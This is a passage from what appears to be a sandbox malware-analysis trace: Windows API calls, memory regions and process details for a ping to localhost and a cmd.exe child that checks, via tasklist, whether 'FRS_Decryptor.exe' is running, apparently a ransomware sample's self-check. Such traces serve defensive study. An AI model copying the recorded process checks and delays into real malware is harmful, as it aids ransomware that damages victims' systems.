lpMode=0x72ede0 | out: lpMode=0x72ede0) returned 0 [0096.227] GetLastError () returned 0x6 [0096.227] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x72ed44, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0096.227] _fileno (_File=0x76ea4c28) returned 1 [0096.227] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0096.227] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0096.227] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0xb280c8 [0096.227] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0xb280c8, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0096.227] _fileno (_File=0x76ea4c28) returned 1 [0096.227] _write (in: _FileHandle=1, _Buf=0xb280c8*, _MaxCharCount=0x5c | out: _Buf=0xb280c8*) returned 92 [0096.227] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.227] _fileno (_File=0x76ea4c28) returned 1 [0096.227] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0096.227] LocalFree (hMem=0xb280c8) returned 0x0 [0096.227] LocalFree (hMem=0xb28000) returned 0x0 [0096.227] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x72ee28, nSize=0x0, Arguments=0x72ee24 | out: lpBuffer="耀²rᨧ\x94䰨盪❓") returned 0x61 [0096.227] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.227] _fileno (_File=0x76ea4c28) returned 1 [0096.227] _get_osfhandle (_FileHandle=1) returned 0x28 [0096.227] GetFileType (hFile=0x28) returned 0x2 [0096.227] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x72edec | out: lpMode=0x72edec) returned 0 [0096.227] GetLastError () returned 0x6 [0096.227] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x72ed50, nSize=0x50 | out: lpBuffer="r❓") returned 0x0 [0096.227] _fileno (_File=0x76ea4c28) returned 1 [0096.227] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0096.227] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0096.227] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0xb280d0 [0096.227] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0xb280d0, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0096.227] _fileno (_File=0x76ea4c28) returned 1 [0096.227] _write (in: _FileHandle=1, _Buf=0xb280d0*, _MaxCharCount=0x61 | out: _Buf=0xb280d0*) returned 97 [0096.227] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.227] _fileno (_File=0x76ea4c28) returned 1 [0096.227] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0096.227] LocalFree (hMem=0xb280d0) returned 0x0 [0096.227] LocalFree (hMem=0xb28000) returned 0x0 [0096.227] IcmpCloseHandle (IcmpHandle=0xb16a68) returned 1 [0096.228] LocalFree (hMem=0xb1c2f0) returned 0x0 [0096.228] LocalFree (hMem=0xb25270) returned 0x0 [0096.228] WSACleanup () returned 0 [0096.228] exit (_Code=0) Thread: id = 251 os_tid = 0x888 Thread: id = 252 os_tid = 0x278 Process: id = "86" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x108a1000" os_pid = "0x648" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4533 start_va = 0x300000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 4534 start_va = 0x320000 end_va = 0x321fff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 4535 start_va = 0x330000 end_va = 0x33efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 4536 start_va = 0x340000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 4537 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 4538 start_va = 0x480000 end_va = 0x483fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 4539 start_va = 0x490000 end_va = 0x490fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 4540 start_va = 0x4a0000 end_va = 0x4a1fff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 4541 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4542 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4543 start_va = 0x7ecb0000 end_va = 0x7ecd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ecb0000" filename = "" Region: id = 4544 start_va = 0x7ecdb000 end_va = 0x7ecddfff entry_point = 0x0 region_type = private name = "private_0x000000007ecdb000" filename = "" Region: id = 4545 start_va = 0x7ecde000 end_va = 0x7ecdefff entry_point = 0x0 region_type = private name = "private_0x000000007ecde000" filename = "" Region: id = 4546 start_va = 0x7ecdf000 end_va = 0x7ecdffff entry_point = 0x0 region_type = private name = "private_0x000000007ecdf000" filename = "" Region: id = 4547 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4548 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4549 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4550 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4551 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 4552 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4553 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4554 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4555 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 4556 start_va = 0x4b0000 end_va = 0x52dfff entry_point = 0x4b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4557 start_va = 0x620000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4558 start_va = 0x890000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 4559 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4560 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4561 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4562 start_va = 0x7ebb0000 end_va = 0x7ecaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ebb0000" filename = "" Region: id = 4563 start_va = 0x310000 end_va = 0x313fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4564 start_va = 0x8a0000 end_va = 0xb74fff entry_point = 0x8a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4583 start_va = 0x320000 end_va = 0x323fff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Thread: id = 253 os_tid = 0x644 [0096.254] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0096.255] __set_app_type (_Type=0x1) [0096.255] __p__fmode () returned 0x76ea1768 [0096.255] __p__commode () returned 0x76ea176c [0096.255] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0096.255] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0096.255] GetCurrentThreadId () returned 0x644 [0096.255] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x644) returned 0x34 [0096.255] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0096.255] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0096.255] SetThreadUILanguage (LangId=0x0) returned 0x409 [0096.257] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0096.257] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x47fe90 | out: phkResult=0x47fe90*=0x0) returned 0x2 [0096.257] VirtualQuery (in: lpAddress=0x47fe9f, lpBuffer=0x47fe38, dwLength=0x1c | out: lpBuffer=0x47fe38*(BaseAddress=0x47f000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0096.257] VirtualQuery (in: lpAddress=0x380000, lpBuffer=0x47fe38, dwLength=0x1c | out: lpBuffer=0x47fe38*(BaseAddress=0x380000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0096.257] VirtualQuery (in: lpAddress=0x381000, lpBuffer=0x47fe38, dwLength=0x1c | out: lpBuffer=0x47fe38*(BaseAddress=0x381000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0096.257] VirtualQuery (in: lpAddress=0x383000, lpBuffer=0x47fe38, dwLength=0x1c | out: lpBuffer=0x47fe38*(BaseAddress=0x383000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0096.257] VirtualQuery (in: lpAddress=0x480000, lpBuffer=0x47fe38, dwLength=0x1c | out: lpBuffer=0x47fe38*(BaseAddress=0x480000, AllocationBase=0x480000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0096.257] GetConsoleOutputCP () returned 0x1b5 [0096.257] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0096.257] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0096.257] _get_osfhandle (_FileHandle=1) returned 0x2a0 [0096.257] SetConsoleMode (hConsoleHandle=0x2a0, dwMode=0x0) returned 0 [0096.257] _get_osfhandle (_FileHandle=1) returned 0x2a0 [0096.257] GetConsoleMode (in: hConsoleHandle=0x2a0, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0096.257] _get_osfhandle (_FileHandle=0) returned 0x24 [0096.257] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0096.257] GetEnvironmentStringsW () returned 0x6240c0* [0096.258] FreeEnvironmentStringsA (penv="=") returned 1 [0096.258] GetEnvironmentStringsW () returned 0x6240c0* [0096.258] FreeEnvironmentStringsA (penv="=") returned 1 [0096.258] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x47ede0 | out: phkResult=0x47ede0*=0x44) returned 0x0 [0096.258] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x47ede8, lpData=0x47edec, lpcbData=0x47ede4*=0x1000 | out: lpType=0x47ede8*=0x0, lpData=0x47edec*=0x0, lpcbData=0x47ede4*=0x1000) returned 0x2 [0096.258] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x47ede8, lpData=0x47edec, lpcbData=0x47ede4*=0x1000 | out: lpType=0x47ede8*=0x4, lpData=0x47edec*=0x1, lpcbData=0x47ede4*=0x4) returned 0x0 [0096.258] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x47ede8, lpData=0x47edec, lpcbData=0x47ede4*=0x1000 | out: lpType=0x47ede8*=0x0, lpData=0x47edec*=0x1, lpcbData=0x47ede4*=0x1000) returned 0x2 [0096.258] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x47ede8, lpData=0x47edec, lpcbData=0x47ede4*=0x1000 | out: lpType=0x47ede8*=0x4, lpData=0x47edec*=0x0, lpcbData=0x47ede4*=0x4) returned 0x0 [0096.258] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x47ede8, lpData=0x47edec, lpcbData=0x47ede4*=0x1000 | out: lpType=0x47ede8*=0x4, lpData=0x47edec*=0x40, lpcbData=0x47ede4*=0x4) returned 0x0 [0096.258] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x47ede8, lpData=0x47edec, lpcbData=0x47ede4*=0x1000 | out: lpType=0x47ede8*=0x4, lpData=0x47edec*=0x40, lpcbData=0x47ede4*=0x4) returned 0x0 [0096.258] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x47ede8, lpData=0x47edec, lpcbData=0x47ede4*=0x1000 | out: lpType=0x47ede8*=0x0, lpData=0x47edec*=0x40, lpcbData=0x47ede4*=0x1000) returned 0x2 [0096.258] RegCloseKey (hKey=0x44) returned 0x0 [0096.258] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x47ede0 | out: phkResult=0x47ede0*=0x44) returned 0x0 [0096.258] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x47ede8, lpData=0x47edec, lpcbData=0x47ede4*=0x1000 | out: lpType=0x47ede8*=0x0, lpData=0x47edec*=0x40, lpcbData=0x47ede4*=0x1000) returned 0x2 [0096.258] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x47ede8, lpData=0x47edec, lpcbData=0x47ede4*=0x1000 | out: lpType=0x47ede8*=0x4, lpData=0x47edec*=0x1, lpcbData=0x47ede4*=0x4) returned 0x0 [0096.258] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x47ede8, lpData=0x47edec, lpcbData=0x47ede4*=0x1000 | out: lpType=0x47ede8*=0x0, lpData=0x47edec*=0x1, lpcbData=0x47ede4*=0x1000) returned 0x2 [0096.258] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x47ede8, lpData=0x47edec, lpcbData=0x47ede4*=0x1000 | out: lpType=0x47ede8*=0x4, lpData=0x47edec*=0x0, lpcbData=0x47ede4*=0x4) returned 0x0 [0096.258] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x47ede8, lpData=0x47edec, lpcbData=0x47ede4*=0x1000 | out: lpType=0x47ede8*=0x4, lpData=0x47edec*=0x9, lpcbData=0x47ede4*=0x4) returned 0x0 [0096.258] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x47ede8, lpData=0x47edec, lpcbData=0x47ede4*=0x1000 | out: lpType=0x47ede8*=0x4, lpData=0x47edec*=0x9, lpcbData=0x47ede4*=0x4) returned 0x0 [0096.258] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x47ede8, lpData=0x47edec, lpcbData=0x47ede4*=0x1000 | out: lpType=0x47ede8*=0x0, lpData=0x47edec*=0x9, lpcbData=0x47ede4*=0x1000) returned 0x2 [0096.258] RegCloseKey (hKey=0x44) returned 0x0 [0096.258] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5008b [0096.258] srand (_Seed=0x5aa5008b) [0096.258] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0096.258] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0096.259] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0096.259] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6240c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0096.259] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0096.259] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0096.259] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0096.259] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.259] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0096.259] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0096.259] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0096.259] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0096.259] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0096.259] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0096.259] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0096.259] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0096.259] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0096.259] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x47fbc0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0096.259] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x47fbc0, lpFilePart=0x47fbbc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x47fbbc*="Desktop") returned 0x1c [0096.259] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0096.259] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x47f938 | out: lpFindFileData=0x47f938) returned 0x6242d8 [0096.259] FindClose (in: hFindFile=0x6242d8 | out: hFindFile=0x6242d8) returned 1 [0096.259] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x47f938 | out: lpFindFileData=0x47f938) returned 0x6242d8 [0096.260] FindClose (in: hFindFile=0x6242d8 | out: hFindFile=0x6242d8) returned 1 [0096.260] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0096.260] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x47f938 | out: lpFindFileData=0x47f938) returned 0x6242d8 [0096.260] FindClose (in: hFindFile=0x6242d8 | out: hFindFile=0x6242d8) returned 1 [0096.260] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0096.260] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0096.260] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0096.260] GetEnvironmentStringsW () returned 0x626190* [0096.260] FreeEnvironmentStringsA (penv="=") returned 1 [0096.260] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0096.260] GetConsoleOutputCP () returned 0x1b5 [0096.260] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0096.260] GetUserDefaultLCID () returned 0x409 [0096.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0096.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x47fcec, cchData=128 | out: lpLCData="0") returned 2 [0096.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x47fcec, cchData=128 | out: lpLCData="0") returned 2 [0096.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x47fcec, cchData=128 | out: lpLCData="1") returned 2 [0096.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0096.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0096.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0096.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0096.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0096.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0096.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0096.261] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0096.261] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0096.261] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0096.261] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0096.262] GetConsoleTitleW (in: lpConsoleTitle=0x624e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0096.262] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0096.262] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0096.262] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0096.262] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0096.263] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0096.263] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0096.263] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0096.263] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0096.263] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0096.263] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0096.263] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0096.263] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0096.263] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0096.263] _wcsicmp (_String1="IF", _String2="find") returned 3 [0096.264] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0096.264] _wcsicmp (_String1="REM", _String2="find") returned 12 [0096.264] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0096.264] _pipe (in: _PtHandles=0x6251f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x6251f0) returned 0 [0096.265] _dup (_FileHandle=1) returned 5 [0096.265] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0096.265] _close (_FileHandle=4) returned 0 [0096.265] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0096.265] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0096.265] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0096.265] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0096.265] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0096.265] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0096.265] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0096.265] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0096.265] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0096.265] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0096.265] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0096.265] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0096.265] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0096.265] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0096.265] 